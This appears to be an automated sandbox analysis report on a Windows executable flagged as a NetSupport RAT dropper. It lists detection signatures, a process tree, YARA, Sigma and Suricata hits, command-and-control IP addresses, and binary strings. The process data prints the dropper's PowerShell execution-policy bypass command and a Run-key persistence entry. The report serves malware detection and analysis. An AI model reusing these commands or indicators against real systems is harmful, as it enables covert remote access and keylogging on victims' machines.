Edit tour

Windows Analysis Report
KC0uZWwr8p.exe

Overview

General Information

Sample name:	KC0uZWwr8p.exe renamed because original name is a hash value
Original sample name:	7b6e6212a6d13800282bd2cb362c2a311d89e543.exe
Analysis ID:	1552424
MD5:	3c387c0db035c0c3185d6fbd1ab46bd1
SHA1:	7b6e6212a6d13800282bd2cb362c2a311d89e543
SHA256:	a1720d68eef7dc381a533fd8584a227db3dbcaed16098a0d7f31077f95355e8c
Tags:	exeNetworkUtilityProOMICAREJOINTSTOCKCOMPANYuser-NDA0E
Infos:

Detection

NetSupport RAT, NetSupport Downloader

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Powershell drops NetSupport RAT client

Suricata IDS alerts for network traffic

Yara detected Advanced IP Scanner Hacktool

Yara detected NetSupport Downloader

Bypasses PowerShell execution policy

Contains functionality to detect sleep reduction / modifications

Contains functionalty to change the wallpaper

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

Potential key logger detected (key state polling based)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Keylogger Generic

Yara detected NetSupport remote tool

Yara signature match

Classification

Process Tree

System is w10x64

KC0uZWwr8p.exe (PID: 7860 cmdline: "C:\Users\user\Desktop\KC0uZWwr8p.exe" MD5: 3C387C0DB035C0C3185D6FBD1AB46BD1)

KC0uZWwr8p.tmp (PID: 7924 cmdline: "C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp" /SL5="$20454,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe" MD5: 77264DBCB409DE0C426BD5088B0FBE09)

powershell.exe (PID: 7320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

client32.exe (PID: 6588 cmdline: "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)

client32.exe (PID: 564 cmdline: "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)

client32.exe (PID: 2636 cmdline: "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SystemUtil\PCICHEK.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1	JoeSecurity_NetSupportDownloader	Yara detected NetSupport Downloader	Joe Security
C:\Program Files (x86)\Advanced IP Scanner\is-3UOHG.tmp	JoeSecurity_AdvancedIPScannerHacktool	Yara detected Advanced IP Scanner Hacktool	Joe Security
C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Program Files (x86)\Advanced IP Scanner\unins000.dat	JoeSecurity_NetSupportDownloader	Yara detected NetSupport Downloader	Joe Security
Click to see the 6 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.1758048452.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000004.00000002.1657069390.0000000005617000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000002.1674375162.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000000.1666448748.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.3146712251.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.3138687651.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000000.1572772209.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.3141893648.00000000025D3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000004.00000002.1657069390.00000000055BE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000002.1673364072.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000A.00000000.1755559896.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000A.00000002.1757246329.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000004.00000002.1657069390.00000000055F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: powershell.exe PID: 7320	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: powershell.exe PID: 7320	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x59b7c3:$b1: ::WriteAllBytes( 0x59b790:$b2: ::FromBase64String( 0x22748:$s1: -join 0x1d4d5a:$s1: -join 0x1e1e2f:$s1: -join 0x1e5201:$s1: -join 0x1e58b3:$s1: -join 0x1e73a4:$s1: -join 0x1e95aa:$s1: -join 0x1e9dd1:$s1: -join 0x1ea641:$s1: -join 0x1ead7c:$s1: -join 0x1eadae:$s1: -join 0x1eadf6:$s1: -join 0x1eae15:$s1: -join 0x1eb665:$s1: -join 0x1eb7e1:$s1: -join 0x1eb859:$s1: -join 0x1eb8ec:$s1: -join 0x1ebb52:$s1: -join 0x1edce8:$s1: -join
Process Memory Space: client32.exe PID: 6588	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 6588	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 564	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 564	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 2636	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 2636	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.client32.exe.70060000.6.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.client32.exe.70060000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.6fff0000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.client32.exe.6fff0000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.6fff0000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.0.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.0.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.0.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.powershell.exe.56196e0.0.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
8.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.70060000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.powershell.exe.55e0b9c.1.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.powershell.exe.560f508.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.68c60000.3.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
8.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 23 entries

Other

Source	Rule	Description	Author	Strings
amsi32_7320.amsi.csv	JoeSecurity_NetSupportDownloader	Yara detected NetSupport Downloader	Joe Security
amsi32_7320.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2e4f73:$b1: ::WriteAllBytes( 0x2e4f3f:$b2: ::FromBase64String( 0x2f16ec:$s1: -join 0x2eae98:$s4: += 0x2eaf5a:$s4: += 0x2ef181:$s4: += 0x2f129e:$s4: += 0x2f1588:$s4: += 0x2f16ce:$s4: += 0x2f4ee4:$s4: += 0x2f4fe8:$s4: += 0x2f8444:$s4: += 0x2f8b24:$s4: += 0x2f8fda:$s4: += 0x2f902f:$s4: += 0x2f92a3:$s4: += 0x2f92d2:$s4: += 0x2f981a:$s4: += 0x2f9849:$s4: += 0x2f9928:$s4: += 0x2fbbbf:$s4: +=

Sigma Signatures

System Summary

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp" /SL5="$20454,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp, ParentProcessId: 7924, ParentProcessName: KC0uZWwr8p.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1", ProcessId: 7320, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp" /SL5="$20454,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp, ParentProcessId: 7924, ParentProcessName: KC0uZWwr8p.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1", ProcessId: 7320, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp" /SL5="$20454,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp, ParentProcessId: 7924, ParentProcessName: KC0uZWwr8p.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1", ProcessId: 7320, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7320, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7320, TargetFilename: C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dll

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp" /SL5="$20454,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp, ParentProcessId: 7924, ParentProcessName: KC0uZWwr8p.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1", ProcessId: 7320, ProcessName: powershell.exe

Remote Access Functionality

Sigma detected: Powershell drops NetSupport RAT client

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7320, TargetFilename: C:\Users\user\AppData\Roaming\SystemUtil\NSM.LIC

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T19:15:13.725991+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.10	49787	TCP
2024-11-08T19:15:53.696550+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.10	49949	TCP

ETPRO MALWARE NetSupport RAT CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T19:14:50.541645+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.10	49837	151.236.16.15	443	TCP
2024-11-08T19:14:50.541645+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.10	49838	199.188.200.195	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: KC0uZWwr8p.exe

ReversingLabs: Detection: 15%

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		6_2_110AC820
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		8_2_110AC820

Source: KC0uZWwr8p.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Users\user\AppData\Roaming\SystemUtil\msvcr100.dll

Jump to behavior

Source: KC0uZWwr8p.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 00000004.00000002.1657069390.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3149635060.0000000070062000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000008.00000002.1675033363.0000000070062000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000A.00000002.1758596218.0000000070062000.00000002.00000001.01000000.0000000C.sdmp, PCICHEK.DLL.4.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: is-4OBJP.tmp.2.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 00000004.00000002.1657069390.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.dr
Source:	Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdb source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Gui.pdb source: is-MH6KB.tmp.2.dr
Source:	Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: is-HN5GF.tmp.2.dr
Source:	Binary string: ucrtbase.pdb source: is-UNKVD.tmp.2.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Gui.pdbo source: is-MH6KB.tmp.2.dr
Source:	Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: is-PCUQ8.tmp.2.dr
Source:	Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Xml.pdb source: is-LNG1F.tmp.2.dr
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: is-0N1O0.tmp.2.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdb source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msvcr100.i386.pdb source: powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.3148929362.0000000068E51000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 00000008.00000002.1674813000.0000000068E51000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000A.00000002.1758377907.0000000068E51000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: is-BLUTK.tmp.2.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: is-133UG.tmp.2.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: is-075U6.tmp.2.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdbss' source: KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp
